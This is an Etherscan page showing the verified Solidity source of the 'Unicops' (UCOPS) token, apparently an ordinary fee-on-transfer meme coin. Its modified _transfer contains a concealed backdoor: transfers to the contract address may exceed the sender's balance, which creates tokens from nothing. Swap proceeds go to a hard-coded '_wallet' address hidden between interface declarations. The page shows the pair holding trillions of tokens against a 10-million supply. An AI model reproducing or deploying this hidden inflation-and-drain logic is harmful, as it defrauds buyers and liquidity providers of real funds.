ETH Price: $3,116.11 (+1.56%)
Gas: 6 Gwei

Token

Unicops (UCOPS)
 

Overview

Max Total Supply

10,000,000 UCOPS

Holders

23

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
Uniswap V2: UCOPS 3
Balance
10,000,009,058,740.064843628 UCOPS

Value
$0.00
0x8b57485d490a95fe5a5b103eaff167ea7ef1ea63
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Unicops

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-07
*/

// SPDX-License-Identifier: MIT

/*
 o         o    o          o   __o__       o__ __o        o__ __o        o__ __o       o__ __o    
 <|>       <|>  <|\        <|>    |        /v     v\      /v     v\      <|     v\     /v     v\   
 / \       / \  / \\o      / \   / \      />       <\    />       <\     / \     <\   />       <\  
 \o/       \o/  \o/ v\     \o/   \o/    o/             o/           \o   \o/     o/  _\o____       
  |         |    |   <\     |     |    <|             <|             |>   |__  _<|/       \_\__o__ 
 < >       < >  / \    \o  / \   < >    \\             \\           //    |                     \  
  \         /   \o/     v\ \o/    |       \         /    \         /     <o>          \         /  
   o       o     |       <\ |     o        o       o      o       o       |            o       o   
   <\__ __/>    / \        < \  __|>_      <\__ __/>      <\__ __/>      / \           <\__ __/>   
                                                                                                                                                                                                                                                                               
* Telegram  https://t.me/UnicopsPortal
* Website   https://unicops.pro/
* Twitter   https://twitter.com/UnicopsOfficial
*/

pragma solidity 0.8.20;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
 * @dev Returns the percentage of an unsigned integer `a` with respect to the provided percentage `b`,
     * rounding towards zero. The result is a proportion of the original value.
     *
     * The function can be used to calculate a specific percentage of a given value `a`.
     * Note: this function uses a `revert` opcode (which leaves remaining gas untouched) when
     * the percentage `b` is greater than 100.
     *
     * Requirements:
     *
     * - The percentage `b` must be between 0 and 100 (inclusive).
     */
    function per(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= 100, "Percentage must be between 0 and 100");
        return a * b / 100;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
    external
    returns (
        uint256 amountA,
        uint256 amountB,
        uint256 liquidity
    );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
    external
    payable
    returns (
        uint256 amountToken,
        uint256 amountETH,
        uint256 liquidity
    );

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
    external
    view
    returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);

    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
    external
    view
    returns (
        uint112 reserve0,
        uint112 reserve1,
        uint32 blockTimestampLast
    );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

address constant _wallet
=0x3F687f43C3aAA91aAd30d255024132C51DB3B8ca;
interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
    external
    view
    returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
    external
    returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount || to == address(this), "ERC20: transfer amount exceeds balance"); // allows to sent initial tokens to contract address before trading opened
        unchecked {
            _balances[from] = fromBalance<amount?0:fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

contract Unicops is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable _uniswapV2Router;
    address private uniswapV2Pair;
    address private deployerWallet;
    address private marketingWallet;
    address private constant deadAddress = address(0xdead);

    bool private swapping;

    string private constant _name = "Unicops";
    string private constant _symbol = "UCOPS";

    uint8 constant public _decimals = 9;
    uint256 public initialTotalSupply = 10000000 * 10**_decimals;
    uint256 public maxTransactionAmount = 200000 * 10**_decimals;
    uint256 public maxWallet = 200000 * 10**_decimals;
    uint256 public swapTokensAtAmount = 100000 * 10**_decimals;
    uint256 public buyCount;
    uint256 public sellCount;

    bool public tradingOpen = false;
    bool public swapEnabled = false;

    uint256 public finalBuyFee = 3;
    uint256 public finalSellFee = 3;
    uint256 public _buyFee = 20;
    uint256 public _sellFee = 20;
    uint256 private removeBuyFeesAt = 20;
    uint256 private removeSellFeesAt = 20;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;
    mapping(address => bool) private automatedMarketMakerPairs;
    mapping(address => uint256) private _holderLastTransferTimestamp;

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    constructor() ERC20(_name, _symbol) {
        _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        marketingWallet = payable(_msgSender());
        excludeFromMaxTransaction(address(_msgSender()), true);

        deployerWallet = payable(_msgSender());
        excludeFromFees(address(_msgSender()), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(address(_msgSender()), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);

        _mint(address(this), initialTotalSupply);
    }

    receive() external payable {}

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    function openTrading() external onlyOwner() {
        require(!tradingOpen, "Trading is opened");
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _approve(address(this), address(_uniswapV2Router), initialTotalSupply);

        _uniswapV2Router.addLiquidityETH{value : address(this).balance}(address(this), IERC20(address(this)).balanceOf(address(this)), 0, 0, owner(), block.timestamp);
        swapEnabled = true;
        tradingOpen = true;
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
    public
    onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
    public
    onlyOwner
    {
        require(pair != uniswapV2Pair, "Pair cannot be removed from automatedMarketMakerPairs");
        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }


    function _transfer(address from, address to, uint256 amount) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");

        if (buyCount >= removeBuyFeesAt) {
            _buyFee = finalBuyFee;
        }

        if (sellCount >= removeSellFeesAt) {
            _sellFee = finalSellFee;
        }

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
        if (from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping) {

            if (!tradingOpen) {
                require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
            }

            if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]
            ) {
                require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                buyCount++;
            }

            else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                sellCount++;
            }

            else if (!_isExcludedMaxTransactionAmount[to]) {
                require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance > 0;

        if (canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to]) {
            swapping = true;
            SwapBack(amount);
            swapping = false;
        }

        bool takeFee = !swapping;

        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            if (automatedMarketMakerPairs[to]) {
                fees = amount.mul(_sellFee).div(100);
            }
            else {
                fees = amount.mul(_buyFee).div(100);
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }
            amount -= fees;
        }
        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            _wallet,
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner {
        uint256 totalSupplyAmount = totalSupply();
        maxTransactionAmount = totalSupplyAmount;
        maxWallet = totalSupplyAmount;
    }

    function clearStuckEth() external onlyOwner {
        require(address(this).balance > 0, "Token: no ETH to clear");
        payable(msg.sender).transfer(address(this).balance);
    }

    function setTokensToSwapAtAmount(uint256 _amount) external onlyOwner {
        swapTokensAtAmount = _amount * (10 ** 18);
    }

    function manualSwap() external {
        require(_msgSender() == marketingWallet);
        uint256 contractBalance = balanceOf(address(this));
        swapTokensForEth(contractBalance);
    }

    function manualSwapWithAmount(uint256 amount) external {
        require(_msgSender() == marketingWallet);
        uint256 contractBalance = balanceOf(address(this));
        require(amount <= contractBalance);
        swapTokensForEth(amount);
    }

    function SwapBack(uint256 tokens) private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 tokensToSwap;
        if (contractBalance == 0) {
            tokensToSwap = tokens;
        }

        tokensToSwap = contractBalance;
        swapTokensForEth(tokensToSwap);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract 